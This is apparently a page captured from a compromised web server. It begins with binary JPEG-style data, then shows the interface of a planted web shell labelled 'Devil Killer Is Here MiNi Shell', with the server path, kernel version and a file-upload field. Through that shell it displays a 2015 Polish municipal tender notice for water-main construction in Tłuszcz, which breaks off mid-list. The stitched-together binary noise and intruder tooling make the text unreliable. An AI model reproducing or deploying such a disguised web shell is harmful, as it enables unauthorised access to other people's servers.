JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150710/102901-N-2015.html

<p class="kh_header"><b>Tłuszcz: Budowa sieci wodociągowej w miejscowościach Łysobyki, Miąse, Jadwinin, Jasienica - ETAP III</b><br>
<b>Numer ogłoszenia: 102901 - 2015; data zamieszczenia: 10.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tłuszcz , ul. Warszawska 10, 05-240 Tłuszcz, woj. mazowieckie, tel. 029 7573016, faks 029 7573016.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tluszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci wodociągowej w miejscowościach Łysobyki, Miąse, Jadwinin, Jasienica - ETAP III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest budowa sieci wodociągowej w miejscowościach Łysobyki, Miąse, Jadwinin, Jasienica ETAP III, obejmująca: Budowa sieci wodociągowej (wskazane odcinki) w miejscowościach Miąse i Jadwinin, z rur PE o śr. 63-160 mm. 
2.	Przedmiot zamówienia obejmuje 2 części:
Część 1: Budowa sieci wodociągowej w miejscowościach Łysobyki, Miąse, Jadwinin, Jasienica - ETAP III - polegająca na wybudowaniu odcinków sieci wodociągowej w miejscowości Jadwinin.
   Część 2: Budowa sieci wodociągowej w miejscowościach Łysobyki, Miąse, Jadwinin,   Jasienica - ETAP III - polegająca na wybudowaniu odcinka sieci wodociągowej w rejonie ulicy Z. Solarzowej  w miejscowości Miąse..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.30.00-2, 45.23.13.00-8, 45.23.31.42-6, 45.33.15.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium na cały okres związania ofertą, w wysokości:  
1) 1 500 zł (słownie: jeden tysiąc pięćset  złotych) dla części 1,
2) 700,00 (słownie: siedemset złotych) dla części 2. 
2. 	Z postępowania o udzielenie zamówienia zostanie wykluczony wykonawca, który nie wniesie wadium. 
3. 	Wadium może być wniesione w następujących formach: 
1) pieniądzu, 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). 
4.	Wadium wnoszone w pieniądzu wnosi się wyłącznie przelewem na rachunek bankowy wskazany przez zamawiającego. Nie jest dopuszczalna bezpośrednia wpłata kwoty wadium 
np. w kasie zamawiającego lub banku. Zaleca się potwierdzenie kopi przelewu - 
za zgodność z oryginałem - zgodnie z zapisem art. 10 § 1 ust. 6 niniejszej SIWZ. 
5. 	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
6.	Wadium w pieniądzu należy wpłacić na konto Zamawiającego: 
       Nr 37 8006 0000 0053 9089 2000 0007 z podaniem numeru przetargu(na przelewach nr rachunku należy pisać w sposób ciągły -bez spacji)
7. 	Wadium wniesione przelewem na konto Gminy uznane będzie za wniesione w terminie, jeżeli przed terminem składania ofert konto zamawiającego będzie uznane kwotą wadium. 
8. 	Wadium wnoszone w formie gwarancji bankowej może być wystawione przez bank krajowy lub zagraniczny.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że zrealizował - ukończył (został podpisany przez Zamawiającego i Wykonawcę końcowy protokół odbioru robót) - w okresie ostatnich pięciu lat przed upływem terminu składani ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - roboty budowlane
Przez roboty budowlane należy rozumieć:
 DLA CZĘŚCI 1  budowę   sieci wodociągowej o wartości brutto nie mniejszej niż 50 000,00 PLN 
DLA CZĘŚĆI 2 budowę   sieci wodociągowej o wartości brutto nie mniejszej niż 20 000,00 PLN</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca do realizacji przedmiotu zamówienia wyznaczy następujące osoby:
 1) kierownik budowy  posiada uprawnienia budowlane do kierowania robotami 
w  specjalności     instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych,
 bez ograniczeń, zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa 
z dnia 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz. 578) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
 2)   kierownik robót drogowych posiada uprawnienia budowlane do kierowania robotami   budowlanymi w specjalności drogowej, zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz. 578) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzenia zmian w umowie, które będą mogły być dokonane z powodu zaistnienia okoliczności, niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji powodujących konieczność:
1)	zmiany terminu realizacji umowy wywołaną:
a)	zmianą warunków określonych w umowie o przekazaniu dotacji na realizację zadania zawartej pomiędzy Gminą Tłuszcz a Zakładem Gospodarki Komunalnej 
i Mieszkaniowej w Tłuszczu - Zamawiającym,
b)	udzieleniem zamówień zamiennych  związanych z realizacją zamówienia podstawowego,
c)	wstrzymaniem realizacji robót przez Nadzór Budowlany, 
d)	przerwami w realizacji robót przez Zamawiającego - niezależnymi 
od Wykonawcy,
e)	przerwami w realizacji robót spowodowanymi czynnikami atmosferycznymi uniemożliwiającymi ich prowadzenie, potwierdzonymi przez inspektora nadzoru inwestorskiego wpisami w dzienniku budowy,
f)	nieprzewidzianymi czynnikami i zdarzeniami losowymi uniemożliwiającymi realizację robót - niezależnymi od woli stron.  
2)	zmiany formy wniesionego zabezpieczenia należytego wykonania umowy,
3)	ograniczenia zakresu robót i zmniejszenia  wynagrodzenia ryczałtowego o wartość robót wyłączonych,
4)	koniecznością wykonania robót zamiennych zgodnie z § 12 ust. 3 Umowy.
5)	zmiany kierownika budowy i inspektora nadzoru,
6)	zmiany danych identyfikacyjnych Wykonawcy (adres siedziby, Regon, NIP, rachunek bankowy),
7)	zmiany podwykonawcy na podwykonawcę, któremu zlecono ten sam zakres robót - 
w przypadku zaistnienia uzasadnionej potrzeby;
8)	jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu posługiwał się zasobami dotychczasowego podwykonawcy, zmiana podwykonawcy możliwa jest po przedłożeniu przez Wykonawcę dokumentów potwierdzających spełnianie warunków udziału w postępowaniu przez zaproponowanego podwykonawcę,
9)	gdy zajdzie konieczność zmiany podwykonawców robót, którym Wykonawca powierzył wykonanie zamówienia, w przypadku wystąpienia o zmianę na wniosek Zamawiającego lub Wykonawcy po uzyskaniu zgody Zamawiającego,
10)	w przypadku gdy realizacja części lub całości przedmiotu niniejszej umowy stanie się niekorzystna dla interesu Zamawiającego lub Gminy Tłuszcz, czego Zamawiający nie mógł przewidzieć na etapie postępowania o udzielenie zamówienia i w dniu zawarcia niniejszej umowy,
11)	wprowadzenia zmian koniecznych dla pozyskania lub zapobieżenia utracie ewentualnego dofinansowania ze źródeł zewnętrznych,
12)	zmiany przepisów prawa mających wpływ na warunki realizacji umowy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tluszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tłuszczu
ul. Warszawska 10
05-240 Tłuszcz
pok. 46.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2015 godzina 11:00, miejsce: Urząd Miejski w Tłuszczu
ul. Warszawska 10
05-240 Tłuszcz
pok. 30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do porozumiewania się z wykonawcami są: Renata Duraj - w sprawach proceduralnych - tel. (29) 777 52 63 Emilia Banaszek - w sprawach dotyczących przedmiotu zamówienia - tel. (29) 777 52 67. Z osobami wymienionymi powyżej można się kontaktować w siedzibie Zamawiającego w godzinach od 8:00 do 16:00, od poniedziałku do czwartku i od 8:00 do 14:00 w piątki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa sieci wodociągowej w miejscowościach Łysobyki, Miąse, Jadwinin, Jasienica - ETAP III - polegająca na wybudowaniu odcinków sieci wodociągowej w miejscowości Jadwinin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót części 1 obejmuje:1) Budowę 3 sięgaczy z sieci wodociągowej w miejscowości Jadwinin, z rur PE śr. 63-110 mm,
o długości łącznej 244,5 m tj..
1)	wykonanie wodociągu z rur PE 100 SDR 17 o śr. 63 mm - L= 19,0 m;
2)	wykonanie wodociągu z rur PE 100 SDR 17 o śr. 90 mm - L= 67,5 m;
3)	wykonanie wodociągu z rur PE 100 SDR 17 o śr. 110 mm - L= 158,0 m;
4)	połączenie rurociągów z istniejącą siecią;
5)	montaż zasuw z żeliwa sferoidalnego przy hydrantach;
6)	montaż hydrantów podziemnych śr. 80 mm z żeliwa sferoidalnego;
7)	montaż kształtek kołnierzowych (wg warunków ZGKiM w Tłuszczu);
8)	roboty towarzyszące wykonaniu wodociągów;
9)	odtworzenia nawierzchni.

    Zakres robót obejmuje ponadto:
Tymczasowe zmiany w organizacji ruchu - projekt i oznakowanie, oraz zajęcie pasów drogowych dróg gminnych (patrz też:  Plan Nawierzchni - ETAP III cz.1).

2) Specyfikacja techniczna użytych materiałów 
1)	Dla rur trójwarstwowych PE100 RC SDR17 PN10  - UKŁADANYCH METODĄ PRZECISKU STEROWANEGO: 
Rury układane za pomocą przecisku sterowanego wykonane jako rury trójwarstwowe PE100 RC SDR17 PN10  wykonane z warstwą ochronną z zewnątrz i od wewnątrz o grubości min. 25% grubości ścianki w kolorze niebieskim i tożsamym zapisem w aprobacie technicznej i o dopuszczalnym zarysowaniu do 20% grubości ścianki z zapisem w karcie katalogowej
Rury muszą posiadać: 
a)	deklarację zgodności producenta z normą PN-EN 12201:2004, 
b)	aprobatę ITB z zapisem o dopuszczeniu do stosowania przy bezwykopowym  układaniu (przewierty) i renowacji starych rurociągów
c)	atest higieniczny; 
d)	świadectwo odbioru partii rur zgodne z PN-EN 10204-3.1 z wynikiem testu FNCT  min. 8760 godzin dla każdej partii surowca; 
e)	certyfikat DIN CERTCO lub TUV zgodności ze specyfikacją techniczną PAS1075; 
f)	system jakości zgodny z PN-EN ISO 9001 i PN-EN ISO 14001
g)	wszystkie dokumenty muszą posiadać datę ważności na dzień składania oferty
Rury muszą posiadać możliwość zgrzewania i łączenia bez konieczności zdejmowania warstw ochronnych (pomiędzy poszczególnymi warstwami występują połączenia molekularne uniemożliwiające mechaniczne rozłączenie).
3.	Rury i kształtki z PEHD od jednego producenta, posiadające system kontroli jakości zgodny z PN-EN ISO 9001, PN-EN14001
4)	Szczegółowy zakres robót określają łącznie: Przedmiar robót i Dokumentacja projektowa


3.5)	Uwagi:
1)	W przedmiarze przyjęto odtworzenie (naprawę) nawierzchni drogowych (patrz też: Plan Nawierzchni) w ilościach niezbędnych dla wykonania wykopów technologicznych przy montażu sieci. W przypadku uszkodzenia podczas prac nawierzchni w ilościach większych, należy je naprawić w 100%, bez względu na ilość podaną w przedmiarze, uwzględniając koszty w ofercie. 
2)	Przedmiar sporządzono na podstawie projektu, z wprowadzeniem, zaakceptowanych przez  autora projektu zmian, polegających na:
- budowie wszystkich rurociągów metodą przewiertu sterowanego, w miejsce 
  projektowanego pierwotnie częściowego układania w wykopach otwartych;
- montażu rurociągów z rur trójwarstwowych PE TS SDR 17 PN10, w związku ze zmianą 
   sposobu układania;
- zastosowaniu zamiennie jako ochronne w przejściach poprzecznych pod drogami 
  lokalnymi, przepustami w ciągu dróg lokalnych i zjazdami prywatnymi, rur 
  PE 100 PN 10 - 225 x 13,4 i 90 x 5,4 mm w  miejsce projektowanych 
  pierwotnie rur stalowych.
3)	Roboty należy wykonać zgodnie z decyzjami, warunkami, uzgodnieniami i stanowiskami stanowiącymi Dokumenty formalno - prawne.
Obowiązki związane z wykonywaniem robót budowlanych, wskazane w Dokumentach formalno - prawnych należeć będą do Wykonawcy robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.30.00-2, 45.23.13.00-8, 45.23.31.42-6, 45.33.15.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwrancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2: Budowa sieci wodociągowej w miejscowościach Łysobyki, Miąse, Jadwinin,   Jasienica - ETAP III - polegająca na wybudowaniu odcinka sieci wodociągowej w rejonie ulicy Z. Solarzowej  w miejscowości Miąse..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4.	Zakres robót części 2 obejmuje: 
Budowa odcinka sieci wodociągowej (wskazany odcinek) w miejscowości Miąse od węzła W15 do ul. Z. Solarzowej , z rur PE o śr. 160 mm, o łącznej długości 84,00 m
Zakres prac obejmuje:
10)	wykonanie wodociągu przeciskiem sterowanym z rur PE100 RC SDR17 PN10  
o śr. 160 mm - L= 30,00 m,
11)	wykonanie wodociągu wykopem otwartym z rur PE100 SDR 17 o śr. 160 mm
 - L= 54,00 m,
12)	połączenie rurociągu z istniejącym odcinkiem sieci,
13)	montaż zasuw z żeliwa sferoidalnego w węźle W16,
14)	montaż kształtek kołnierzowych (wg warunków ZGKiM w Tłuszczu),
15)	częściową wymianę gruntu w wykopach (podsypka i obsypka),
16)	roboty towarzyszące wykonaniu wodociągów,
17)	odtworzenia nawierzchni.

    Zakres robót obejmuje ponadto:
Tymczasowe zmiany w organizacji ruchu - projekt i oznakowanie, oraz zajęcie pasów drogowych drogi gminnej i drogi wojewódzkiej (patrz też:  Plan Nawierzchni - ETAP III cz.2).

4.1) Specyfikacja techniczna użytych materiałów 
2)	Dla rur trójwarstwowych PE100 RC SDR17 PN10  - UKŁADANYCH METODĄ PRZECISKU STEROWANEGO: 
Rury układane za pomocą przecisku sterowanego wykonane jako rury trójwarstwowe PE100 RC SDR17 PN10  wykonane z warstwą ochronną z zewnątrz i od wewnątrz o grubości min. 25% grubości ścianki w kolorze niebieskim i tożsamym zapisem w aprobacie technicznej i o dopuszczalnym zarysowaniu do 20% grubości ścianki z zapisem w karcie katalogowej
Rury muszą posiadać: 
h)	deklarację zgodności producenta z normą PN-EN 12201:2004, 
i)	aprobatę ITB z zapisem o dopuszczeniu do stosowania przy bezwykopowym  układaniu (przewierty) i renowacji starych rurociągów;
j)	atest higieniczny; 
